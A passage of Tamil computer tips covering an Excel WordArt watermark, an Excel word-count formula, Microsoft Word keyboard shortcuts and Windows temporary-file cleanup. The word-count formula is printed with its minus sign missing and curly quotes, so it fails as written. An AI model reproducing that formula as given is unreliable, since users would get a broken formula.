2. கிடைக்கும் வேர்ட் ஆர்ட் காலரியில் உங்களுக்குப் பிடித்த வேர்ட் 
ஆர்ட்டினைத் தேர்ந்தெடுத்து என்டர் செய்தால் அதனை எடிட் செய்திடும் விண்டோ கிடைத்திடும். டெக்ஸ்ட்டை நீங்கள் அமைக்க விரும்பும் சொல்லாக மாற்றவும். பின் பாண்ட் அதன் அளவு ஆகியவற்றைத் தேர்ந்தெடுத்து ஓகே கிளிக் செய்து வெளியேறவும்.

3. இப்போது நீங்கள் தேர்ந்தெடுத்த சொல் வேர்ட் ஆர்ட் படிவத்தில் ஒர்க் ஷீட்டில் கிடைக்கும். அதன் மீது ரைட் கிளிக் செய்திடவும். Format WordArt என்பதைத் தேர்ந் தெடுக்கவும். கிடைக்கும் விண்டோவில Colors and Lines என்ற டேபில் கிளிக் செய்திடவும். இதில் Fill என்ற பகுதியில் No Fill என்பதனைத் தேர்ந்தெடுக்கவும். Line என்ற பிரிவில் மிகவும் வெளிறிப்போன வண்ணமாக இல்லாமல் ஓரளவிற்குத் தெரிகின்ற வண்ணமாகத் தேர்ந்தெடுக்கவும்.

4. மீண்டும் வேர்ட் ஆர்ட் மீது ரைட் கிளிக் செய்திடவும். வரும் மெனுவில் Order என்பதனைத் தேர்ந்தெடுக்கவும். அதன்பின் Send to Back என்பதில் கிளிக் செய்து மெனுவை மூடவும். 5. இப்போது வேர்ட் ஆர்ட்டில் உள்ள அந்த சொல்லை எந்த இடத்தில் எந்த கோணத்தில் வைத்திட வேண்டும் என்பதனை முடிவு செய்து அதே போல் வைக்கவும். இந்த வேர்ட் ஆர்ட் சில செல்கள் மீது இடம் பெற்றிருந்தாலும் அந்த செல்களில் நீங்கள் உங்கள் தகவல்களை இடலாம். தகவல்கள் வேர்ட் ஆர்ட் மீதாக குறிப்பிட்ட செல்களில் அமையும். இப்போது ஒர்க் ஷீட்டில் நீங்கள் தேர்ந்தெடுத்து அமைத்த வாட்டர் மார்க் இடம் பெறும். இது அச்சிலும் தெரியவரும்.

எக்ஸெல் ஒர்க் ஷிட்டில் செல் ஒன்றில் உள்ள சொற்களின் எண்ணிக்கையை தெரிந்து கொள்ளலாம். இதற்கான பார்முலாவினை அந்த செல்லுக்காய் அமைத்தால் போதும். எடுத்துக் காட்டாக A1 செல்லில் Do you have today’s Dinamalar? என டைப் செய்திடுங்கள். அதன் பின் கீழ்க்குறித்த பங்சனைப் பயன்படுத்தவும்.=IF(LEN(A1)=0,0,LEN(TRIM(A1))LEN(SUBSTITUTE(TRIM(A1),” “,””))+1) விடை 5 எனக் கிடைக்கும்.

வேர்ட் ஷார்ட் கட் -- WORD SHORT CUTS METHODS IN TAMIL


computer word short cuts keys in tamil
வேர்ட் தொகுப்பிற்கென பல ஷார்ட் கட் கீ தொகுப்புகள் உருவாக்கப்பட்டுள்ளன. ஆனால் நமக்கு அடிக்கடி பயன்படுத்தக் கூடியதாக ஒரு சில உள்ளன. வாசகர்கள் அவற்றை அவ்வப்போது வெளியிடுங்கள் என்று கேட்டு கடிதங்கள் எழுதுகின்றனர். எனவே கீழே தரப்பட்டுள்ளவற்றை நீங்கள் முன்பு இம்மலரில் படித்திருந்தாலும் இதனையும் மனதில் கொள்ள படித்து வையுங்கள்; பயன்படுத்துங்கள். 

Alt + F10 – விண்டோவினை அதன் முழு அளவிற்கு மாற்றுகிறது

Alt + F5 – விண்டோவினை பழைய வழக்கமான நிலைக்குக் கொண்டு வரும்.

Ctrl + Shift + A தேர்ந்தெடுக்கப்பட்ட டெக்ஸ்ட் முழுவதையும் கேப்பிடல் எழுத்துக் களாக மாற்றுகிறது. இதனை Shift+F3 என்ற கீகளூம் மேற் கொ
ள்ளும்.

Shift + F2– தேர்ந்தெடுக்கப்பட்ட டெக்ஸ்ட்டை கிளிப் போர்டுக்குக் கொண்டு செல்லாமல் காப்பி செய்கிறது. காப்பி செய்ததனை பேஸ்ட் செய்திட என்டர் அழுத்தினால் போதும்.

Ctrl+ Backspace பின்புறமாக ஒரு சொல்லை அழித்திடும். ஆனால் இது காப்பி செய்யப்பட மாட்டாது.

Ctrl+W, Ctrl+F4 – இந்த இரண்டு கீ இணைப்புகளும் அப்போது பணியாற்றிக் கொண் டிருக்கும் பைலை சேவ் செய்திடவா என்று ஒரு டயலாக் பாக்ஸ் மூலம் கேட்டுவிட்டு பின் அழுத்தும் கட்டத்திற்கேற்றபடி பைலை மூடும்.

Alt + Ctrl + S பணியாற்றிக் கொண்டிருக்கும் விண்டோவினை படுக்கை வாக்கில் பிரிக்கும் கோடு கிடைக்கும். பின் அந்த கோட்டினை நகர்த்தி விண்டோவைப் பிரித்துப் பயன்படுத்தலாம்.

Ctrl + Shift + D தேர்ந்தெடுக்கப்பட்ட டெக்ஸ்ட்டின் கீழாக இரு கோடுகள் இடப்படும். இதனை நீக்குவதற்கு மீண்டும் இதே கீகளைப் பயன்படுத்தலாம்.

F5 அல்லது Ctrl+G செயல்பட்டுக் கொண்டிருக்கும் ஆவணத்தில் குறிப்பிட்ட பக்கத்திற்குச் சென்று சொற்களைத் தேடி அவற்றிற்குப் பதிலாக வேறு சொற்களை அமைத்திட இந்த கீகளைப் பயன்படுத்தலாம்.

Ctrl+H ஒரு குறிப்பிட்ட டெக்ஸ்ட்டைக் கண்டுபிடித்து அதற்குப் பதிலாக நாம் தேர்ந்தெடுக்கும் அல்லது அமைக்கும் டெக்ஸ்ட்டை ஒட்டும்.

Ctrl+F2 அனைத்து பக்கங்களின் அச்சு தோற்றத்தைக் காட்டும்.

Alt F, I பணியாற்றிக் கொண்டிருக்கும் ஆவணத்தின் பிராபர்ட்டீஸ் பார்க்க இந்த கீகளை வரிசையாக அழுத்தவும்.

Shift + F5 ஆவணத்தில் முன்பு டெக்ஸ்ட்டை செருகிய இடத்திற்கு உங்கள் கர்சரை எடுத்துச் செல்லும். இது போல மூன்று முந்தைய இடத்திற்கு எடுத்துச் செல்லும். அதன்பின் மீண்டும் பழைய இடத்திற்கு வந்துவிடும். இது மிகவும் பயனுள்ள ஒரு ஷார்ட் கட். இதனால் ஒரு ஆவணத்தைத் திறந்திடுகையில் அதனை முன்பு பயன் படுத்துகையில் எந்த இடத்தில் எடிட் செய்து கொண்டிருந்தீர்களோ அந்த இடத்திற்கு இந்த கீகளைப் பயன்படுத்திச் சென்று விடலாம்.

Ctrl + >
தேர்ந்தெடுக்கப்பட்ட டெக்ஸ்ட்டின் எழுத்து அளவை அதிகரிக்கச் செய்திடும். அளவு 12க்குப் பின் மெனுவில் இருப்பது போல இரண்டு இரண்டாகக் கூட்டும். (கவனம் கொள்ள வேண்டியது என்னவென்றால் இரண்டாவது கீயை அமைக்க ஷிப்ட் கீயை அழுத்த வேண்டியதிருக்கும்.)

Ctrl + ]
இது முந்தைய கீ அழுத்துதலில் இருந்து சற்று வேறுபட்டது. இந்த கீகள் தேர்ந்தெடுக்கப்பட்ட டெக்ஸ்ட்டின் எழுத்து அளவை ஒவ்வொரு பாயிண்ட்டாக அதிகரிக்கச் செய்திடும்.

Ctrl + Shift + H தேர்ந்தெடுக்கப்பட்ட டெக்ஸ்ட்டினை மறைத் திடும். மீண்டும் அழுத்த அவை கிடைத்திடும்.

Alt + Shift + D நீங்கள் உருவாக்கிடும் ஆவணத்தில் ஒரு இடத்தில் அன்றைய தேதியை டைப் செய்திட விரும்புகிறீர்கள். அதற்காக அந்த தேதியை டைப் செய்திட வேண்டியதில்லை. பலருக்கு தேதி நினைவிலும் இருக்காதே. இதற்காக இந்த கீகளைப் பயன்படுத்துங்கள். அன்றைய தேதி அழகாக வந்து உட்கார்ந்துவிடும்.

Alt + Shift + T மேலே சொன்னது போல ஓர் ஆவணத்தில் அப்போதைய நேரத்தை அமைத்திட இந்த கீகளை அழுத்துங்கள். நேரம் அழகாக டைப் செய்யப்பட்டுவிடும்.

Ctrl + Shift + W வேர்ட் டாகுமெண்ட்டில் அடிக் கோடிட கீயை அழுத்தினால் அது சொற்களுக்கு இடையே உள்ள இடைவெளியிலும் கோடிடுகிறது. அது போல அல்லாமல் சொற்களுக்கு அடியில் மட்டும் கோடு போட இந்த கீகளைப் பயன்படுத்தவும்.

Alt + F11 வேர்ட் தொகுப்பில் பணியாற்று கையில் விசுவல் பேசிக் எடிட்டிங் என்விரோன்மெண்ட்டுக்கு மாற வேண்டுமா? இந்த கீகளைப் பயன்படுத்தவும்.

Alt V, H ஆவணத்தின் ஹெடர் பகுதியில் உள்ள தலைப்பை எடிட் செய்திட அந்த இடத்திற்குச் செல்ல இந்த கீகளைப் பயன்படுத்தவும்.

Shift + F7 ஒரு சொல் சார்ந்த பிற சொற்களைக் காட்டும் நூலுக்கு தெசாரஸ் என்று ஆங்கிலத்தில் பெயர். ஆங்கில சொல் ஒன்றுக்கு சார்ந்த சொல் வேண்டும் என்றால் இந்த கீகளை அழுத்தவும்.

டிப்ஸ்! டிப்ஸ்! டிப்ஸ்! TAMIL COMPUTER TIPS ABOUT WINDOWS OPERATING SYSTEM


 

விண்டோஸ் ஆப்பரேட்டிங் சிஸ்டமும், பல அப்ளிகேஷன்களும் தங்கள் தேவைக்கேற்ப பல தற்காலிக பைல்க
ளை உருவாக்கி இந்த போல்டர்களில் போட்டு வைத்திருக்கும். 

இந்த பைல்களை அவை பயன்படுத்திக் கொண்டிருக்கும்போது அழிக்க முடியாது; பயன்படுத்தாத பைல்களை அழிக்கலாம். கம்ப்யூட்டர் பூட்டாகும் பொழுது F8 கீயை அழுத்தி Command Prompt மெனுவைத் தேர்வு செய்து டாஸில் நுழையுங்கள். அங்கிருந்து மேற்கூறிய டைரக்டரிகளில் உள்ள பைல்களை அழியுங்கள். அதற்கான கட்டளையைச் சரியான பாத் இணைத்து கொடுக்க வேண்டும்.



இன்டர்நெட் பிரவுசரில் .com என்று முடியும் தளங்களுக்கு அதன் பெயரை மட்டும் டைப் செய்து கண்ட்ரோல் + என்டர் தட்டினால் போதும. அதுபோல் “www” and “.net” என அமைய ஷிப்ட் + என்டர் தட்டவும். அடுத்து “www” and “.org” என அமைய கண்ட்ரோல்+ஷிப்ட்+என்டர் தட்டவும்.